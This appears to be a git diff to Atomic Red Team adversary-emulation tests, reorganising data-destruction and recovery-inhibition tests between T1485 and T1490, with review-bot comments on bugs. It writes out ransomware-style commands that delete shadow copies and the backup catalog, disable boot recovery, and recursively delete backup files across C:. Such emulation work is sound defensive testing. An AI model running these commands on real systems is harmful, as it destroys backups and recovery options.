diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index 66d0d18b..f7b2f8b7 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -8,103 +8,16 @@ To maximize impact on the target organization in operations where network-wide a
## Atomic Tests
-- [Atomic Test #1 - Windows - Delete Volume Shadow Copies](#atomic-test-1---windows---delete-volume-shadow-copies)
+- [Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-1---windows---overwrite-file-with-sysinternals-sdelete)
-- [Atomic Test #2 - Windows - Delete Windows Backup Catalog](#atomic-test-2---windows---delete-windows-backup-catalog)
-
-- [Atomic Test #3 - Windows - Disable Windows Recovery Console Repair](#atomic-test-3---windows---disable-windows-recovery-console-repair)
-
-- [Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-4---windows---overwrite-file-with-sysinternals-sdelete)
-
-- [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd)
-
-- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
+- [Atomic Test #2 - macOS/Linux - Overwrite file with DD](#atomic-test-2---macoslinux---overwrite-file-with-dd)
-## Atomic Test #1 - Windows - Delete Volume Shadow Copies
-Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-vssadmin.exe delete shadows /all /quiet
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #2 - Windows - Delete Windows Backup Catalog
-Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-wbadmin.exe delete catalog -quiet
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #3 - Windows - Disable Windows Recovery Console Repair
-Disables repair by the Windows Recovery Console on boot.
-This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
-bcdedit.exe /set {default} recoveryenabled no
-```
-
-#### Cleanup Commands:
-```cmd
-bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
-bcdedit.exe /set {default} recoveryenabled yes
-```
-
-
-
-
-
-
-
-
-## Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete
-Overwrites and deletes a file using Sysinternals SDelete.
-Requires the download of either Sysinternals Suite or the individual SDelete utility.
+## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete
+Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
+the powershell session along with other information about the file that was deleted.
**Supported Platforms:** Windows
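Review bot: dropping "Windows - Delete Volume Shadow Copies" (`vssadmin.exe delete shadows /all /quiet`) from T1485 only preserves coverage if T1490 already has a vssadmin-based variant; the T1490 index context visible in this diff lists only #3 (backup catalog), #4 (recovery console), #5 (shadow copies via WMI with PowerShell) and the new #6, so please confirm T1490's #1/#2 cover the vssadmin command before merging. The other three removed tests (backup catalog, recovery console, backup files) do reappear under T1490, which is the right technique for them. Separately, every file in this change is generated output (the technique .md pages and the index files); if `atomics/T1485/T1485.yaml` and `atomics/T1490/T1490.yaml` are the source they are built from, those need to be in the change as well, since no hunk here touches them.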
@@ -114,15 +27,15 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| sdelete_exe | Path of sdelete executable | Path | PathToAtomicsFolder\T1485\bin\sdelete.exe|
+| sdelete_exe | Path of sdelete executable | Path | $env:TEMP\Sdelete\sdelete.exe|
+| file_to_delete | Path of file to delete | path | $env:TEMP\T1485.txt|
#### Attack Commands: Run with `powershell`!
```powershell
-New-Item $env:TEMP\T1485.txt
-#{sdelete_exe} -accepteula $env:TEMP\T1485.txt
+Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
```
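Review bot: `Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"` re-parses the expanded string as a command line with unquoted arguments, so it breaks as soon as either path contains a space, and the new default of `$env:TEMP\Sdelete\sdelete.exe` makes that likely on any profile path with a space in the user name. The call operator does the same job without re-parsing: `& "#{sdelete_exe}" -accepteula "#{file_to_delete}"`. Also, the removed `New-Item $env:TEMP\T1485.txt` created the target on every run; now that creation lives in a prerequisite, a second run of the executor fails the prereq check until Get Prereq is repeated, which is worth a sentence in the description.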
@@ -132,14 +45,22 @@ New-Item $env:TEMP\T1485.txt
##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{sdelete_exe}) {0} else {1}
+if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
-New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
-Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
+Remove-Item $env:TEMP\SDelete.zip -Force
+```
+##### Description: The file to delete must exist at #{file_to_delete}
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+New-Item #{file_to_delete} -Force | Out-Null
```
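Review bot: the Get Prereq block no longer puts the binary where `#{sdelete_exe}` points. `Expand-Archive` always unpacks into `$env:TEMP\Sdelete`, so for any user who overrides `sdelete_exe` (the reason the argument exists) `Test-Path #{sdelete_exe}` still fails after the prerequisite runs. Either keep the removed `New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null` and `Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force`, or drop the argument and hardcode the TEMP path. The `exit 0` / `exit 1` change is the right fix; the old `{0} else {1}` only wrote a number to output and never set an exit code. Minor: `New-Item #{file_to_delete} -Force | Out-Null` creates a zero-byte file, so the overwrite pass has no data to scrub; writing a line of content (e.g. `Set-Content #{file_to_delete} "T1485"`) would make the test exercise what its title claims.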
@@ -148,7 +69,7 @@ Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
-## Atomic Test #5 - macOS/Linux - Overwrite file with DD
+## Atomic Test #2 - macOS/Linux - Overwrite file with DD
Overwrites and deletes a file using DD.
To stop the test, break the command with CTRL/CMD+C.
@@ -176,28 +97,4 @@ dd of=#{file_to_overwrite} if=#{overwrite_source}
-
-
-
-## Atomic Test #6 - Windows - Delete Backup Files
-Deletes backup files in a manner similar to Ryuk ransomware.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
-```
-
-
-
-
-
-
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md
index 1cf97717..d0bf8477 100644
--- a/atomics/T1490/T1490.md
+++ b/atomics/T1490/T1490.md
@@ -21,6 +21,8 @@ A number of native Windows utilities have been used by adversaries to disable or
- [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell)
+- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
+
@@ -133,6 +135,11 @@ bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
+#### Cleanup Commands:
+```cmd
+bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
+bcdedit.exe /set {default} recoveryenabled yes
+```
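Review bot: the cleanup hardcodes `bootstatuspolicy DisplayAllFailures` and `recoveryenabled yes`. Those are the usual Windows defaults, but not necessarily what the host had before the test, so on a machine with a customised `{default}` entry the cleanup silently replaces the original configuration. Either say in the description that cleanup assumes stock defaults, or have the test record the current values from `bcdedit.exe /enum {default}` before changing them.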
@@ -165,4 +172,29 @@ Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
+
+
+
+## Atomic Test #6 - Windows - Delete Backup Files
+Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
+to delete files from around the system.
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+```
+
+
+
+
+
+
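Review bot: `del /s /f /q c:\*.VHD c:\*.bac c:\*.bak ... c:\*.dsk` recurses the entire C: volume with no scoping argument and no cleanup, so on any test host that genuinely keeps backups or VHDs under C: this destroys them for real. An input argument for the root path (defaulting to a scratch directory) plus a prerequisite that creates sample `.bak` / `.VHD` files would keep the behaviour demonstrable while bounding the blast radius, and the description should carry an explicit warning either way. Dropping the old `>nul 2>&1` is consistent with the new sentence about "access is denied" output, but that sentence has a typo: "exection" should be "execution".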
diff --git a/atomics/index.md b/atomics/index.md
index 41e1d47b..ddddc195 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -493,12 +493,8 @@
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- [T1485 Data Destruction](./T1485/T1485.md)
- - Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- - Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
- - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
- - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
- - Atomic Test #6: Windows - Delete Backup Files [windows]
+ - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
+ - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -511,6 +507,7 @@
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
+ - Atomic Test #6: Windows - Delete Backup Files [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](./T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 59b3f4a8..88e41b50 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -15971,73 +15971,39 @@ impact:
modified: '2019-07-19T14:34:28.595Z'
identifier: T1485
atomic_tests:
- - name: Windows - Delete Volume Shadow Copies
- description: 'Deletes Windows Volume Shadow Copies. This technique is used by
- numerous ransomware families and APT malware such as Olympic Destroyer.
-
-'
- supported_platforms:
- - windows
- executor:
- name: command_prompt
- elevation_required: true
- command: 'vssadmin.exe delete shadows /all /quiet
-
-'
- - name: Windows - Delete Windows Backup Catalog
- description: 'Deletes Windows Backup Catalog. This technique is used by numerous
- ransomware families and APT malware such as Olympic Destroyer.
-
-'
- supported_platforms:
- - windows
- executor:
- name: command_prompt
- elevation_required: true
- command: 'wbadmin.exe delete catalog -quiet
-
-'
- - name: Windows - Disable Windows Recovery Console Repair
- description: |
- Disables repair by the Windows Recovery Console on boot.
- This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
- supported_platforms:
- - windows
- executor:
- name: command_prompt
- elevation_required: true
- command: |
- bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- bcdedit.exe /set {default} recoveryenabled no
- cleanup_command: |
- bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
- bcdedit.exe /set {default} recoveryenabled yes
- name: Windows - Overwrite file with Sysinternals SDelete
description: |
- Overwrites and deletes a file using Sysinternals SDelete.
- Requires the download of either Sysinternals Suite or the individual SDelete utility.
+ Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
+ the powershell session along with other information about the file that was deleted.
supported_platforms:
- windows
input_arguments:
sdelete_exe:
description: Path of sdelete executable
type: Path
- default: PathToAtomicsFolder\T1485\bin\sdelete.exe
+ default: "$env:TEMP\\Sdelete\\sdelete.exe"
+ file_to_delete:
+ description: Path of file to delete
+ type: path
+ default: "$env:TEMP\\T1485.txt"
dependency_executor_name: powershell
dependencies:
- description: Secure delete tool from Sysinternals must exist on disk at specified
location (#{sdelete_exe})
- prereq_command: 'if (Test-Path #{sdelete_exe}) {0} else {1}'
+ prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}'
get_prereq_command: |-
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
- New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
- Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
+ Remove-Item $env:TEMP\SDelete.zip -Force
+ - description: 'The file to delete must exist at #{file_to_delete}'
+ prereq_command: 'if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1
+ }'
+ get_prereq_command: 'New-Item #{file_to_delete} -Force | Out-Null'
executor:
name: powershell
- command: |
- New-Item $env:TEMP\T1485.txt
- #{sdelete_exe} -accepteula $env:TEMP\T1485.txt
+ command: 'Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
+
+'
- name: macOS/Linux - Overwrite file with DD
description: |
Overwrites and deletes a file using DD.
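Review bot: the two input arguments disagree on type casing, `type: Path` for `sdelete_exe` versus `type: path` for the new `file_to_delete`; pick one so the generated tables and any tooling that filters on type stay consistent. The single-quoted `command: 'Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"` scalar carries the same space-in-path problem as the markdown page; `& "#{sdelete_exe}" -accepteula "#{file_to_delete}"` avoids re-parsing the expanded string.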
@@ -16058,19 +16024,6 @@ impact:
name: bash
command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
-'
- - name: Windows - Delete Backup Files
- description: 'Deletes backup files in a manner similar to Ryuk ransomware.
-
-'
- supported_platforms:
- - windows
- executor:
- name: command_prompt
- elevation_required: true
- command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
- c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
-
'
'':
technique:
@@ -16250,6 +16203,9 @@ impact:
command: |
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
+ cleanup_command: |
+ bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
+ bcdedit.exe /set {default} recoveryenabled yes
- name: Windows - Delete Volume Shadow Copies via WMI with PowerShell
description: |
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
@@ -16263,6 +16219,19 @@ impact:
elevation_required: true
command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
+'
+ - name: Windows - Delete Backup Files
+ description: |
+ Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
+ to delete files from around the system.
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
+ c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+
'
T1496:
technique:
diff --git a/atomics/linux-index.md b/atomics/linux-index.md
index b698d0ab..d900a71f 100644
--- a/atomics/linux-index.md
+++ b/atomics/linux-index.md
@@ -39,7 +39,7 @@
# impact
- [T1531 Account Access Removal](./T1531/T1531.md)
- [T1485 Data Destruction](./T1485/T1485.md)
- - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
+ - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/macos-index.md b/atomics/macos-index.md
index 4f6557a3..5cf8dce9 100644
--- a/atomics/macos-index.md
+++ b/atomics/macos-index.md
@@ -56,7 +56,7 @@
# impact
- [T1531 Account Access Removal](./T1531/T1531.md)
- [T1485 Data Destruction](./T1485/T1485.md)
- - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
+ - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 15cdc6f1..c64363d7 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -356,11 +356,7 @@
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- [T1485 Data Destruction](./T1485/T1485.md)
- - Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- - Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
- - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
- - Atomic Test #6: Windows - Delete Backup Files [windows]
+ - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -373,6 +369,7 @@
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
+ - Atomic Test #6: Windows - Delete Backup Files [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](./T1496/T1496.md)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)